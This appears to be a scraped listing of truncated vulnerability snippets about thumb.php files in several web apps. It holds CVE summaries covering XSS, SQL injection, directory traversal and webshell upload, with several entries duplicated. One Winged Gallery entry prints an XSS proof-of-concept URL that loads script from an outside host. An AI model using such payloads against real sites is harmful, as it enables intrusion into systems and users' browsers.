Thinksns2. 8 file upload exploit exp-vulnerability warning-the black bar safety net

Vulnerability version The presence of vulnerabilities the version: latest 2. 8 stable version. Other version not test. Vulnerability file Vulnerable file is: thumb.php Author: Wei kunpeng 1, Prepare the following PHP file and upload it to the server yourself. File content as follows: ? php echo “...

CVE-2010-5284

Multiple cross-site scripting XSS vulnerabilities in Collabtive 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the 1 User parameter in the edit user profile feature to manageuser.php, 2 y parameter in a newcal action to manageajax.php, and the 3 pic parameter to thumb.php...

CVE-2010-5284

Multiple cross-site scripting XSS vulnerabilities in Collabtive 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the 1 User parameter in the edit user profile feature to manageuser.php, 2 y parameter in a newcal action to manageajax.php, and the 3 pic parameter to thumb.php...

ThinkSNS 2.5 thumb.php 文件上传漏洞

No description provided by source...

Thinksns 2.5 to obtain webshell exp-vulnerability warning-the black bar safety net

Problem file: thumb.php Code analysis: ? php / automatic thumbnail parameters of the url|w|h|type="cut/full"|mark="text/image|r" thumb. php? url=/thinksns/data/userface/0 0 0/0 0/0 0/41middleface. jpg? 1 2 4 7 7 1 8 9 8 8&w=2 0&h=2 0 / errorreporting0; settimelimit3 0; $biggestmemorylimit = 2 5 6...

CVE-2011-4920

Multiple cross-site scripting XSS vulnerabilities in e107 0.7.26, and other versions before 1.0.0, allow remote attackers to inject arbitrary web script or HTML via the URL to 1 e107images/thumb.php or 2 rate.php, 3 resendname parameter to e107admin/users.php, and 4 link BBCode in user signatures...

CVE-2010-1190

thumb.php in MediaWiki before 1.15.2, when used with access-restriction mechanisms such as imgauth.php, does not check user permissions before providing scaled images, which allows remote attackers to bypass intended access restrictions and read private images via unspecified manipulations...

CVE-2010-1190

thumb.php in MediaWiki before 1.15.2, when used with access-restriction mechanisms such as imgauth.php, does not check user permissions before providing scaled images, which allows remote attackers to bypass intended access restrictions and read private images via unspecified manipulations...

CVE-2010-1190

thumb.php in MediaWiki before 1.15.2, when used with access-restriction mechanisms such as imgauth.php, does not check user permissions before providing scaled images, which allows remote attackers to bypass intended access restrictions and read private images via unspecified manipulations...

CVE-2009-3538

Directory traversal vulnerability in thumb.php in Clear Content 1.1 allows remote attackers to read arbitrary files via a .. dot dot in the url parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information...

Sql injection

Multiple SQL injection vulnerabilities in E-Uploader Pro 1.0 aka Uploader PRO, when magicquotesgpc is disabled, allow remote attackers to execute arbitrary SQL commands via the 1 id parameter to a img.php, b file.php, c mail.php, d thumb.php, e zip.php, and f zipit.php, and 2 the view parameter t...

Winged Gallery v1.0

Winged Gallery v1.0 Homepage: http://winged.info/index.php?p=gallery XSS vuln on thumb.php: http://example.com/gallery/thumb.php?image=data/Example+Folder/firefox+icon.jpg"''"""SCRIPT20SRC=http://youfucktard.com/xss.js/SCRIPT"''''&size=75&type=2&w=128&h=128"''"""...

Winged Gallery 1.0 - Thumb.php Cross-Site Scripting

Winged Gallery 1.0 - Thumb.php Cross-Site Scripting source: https://www.securityfocus.com/bid/18629/info Winged Gallery is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue...

CVE-2005-3763

Exponent CMS 0.96.3 and later versions includes the full installation path in the base parameter to thumb.php, which allows remote attackers to obtain sensitive information. NOTE: this might be resultant from an absolute path traversal vulnerability...

W-Nailer 0.34

случайно обнаружыл искал уязвимости на чужом сайте уязвимость в W-Nailer 0.34. Разработчик - http://wnailer.vddh.com/ Узвимость: в файле scripts/thumb.php не проверяется file, в итоге - возможность просмотра любых файлоф на сайте, при просмотре превьюшек типа шелла что-то Пример:...

CVE-2004-1407

Multiple directory traversal vulnerabilities in singapore Image Gallery Web Application 0.9.10 allow remote attackers to 1 read arbitrary files via the showThumb method for thumb.php, or 2 delete arbitrary files via admin.class.php...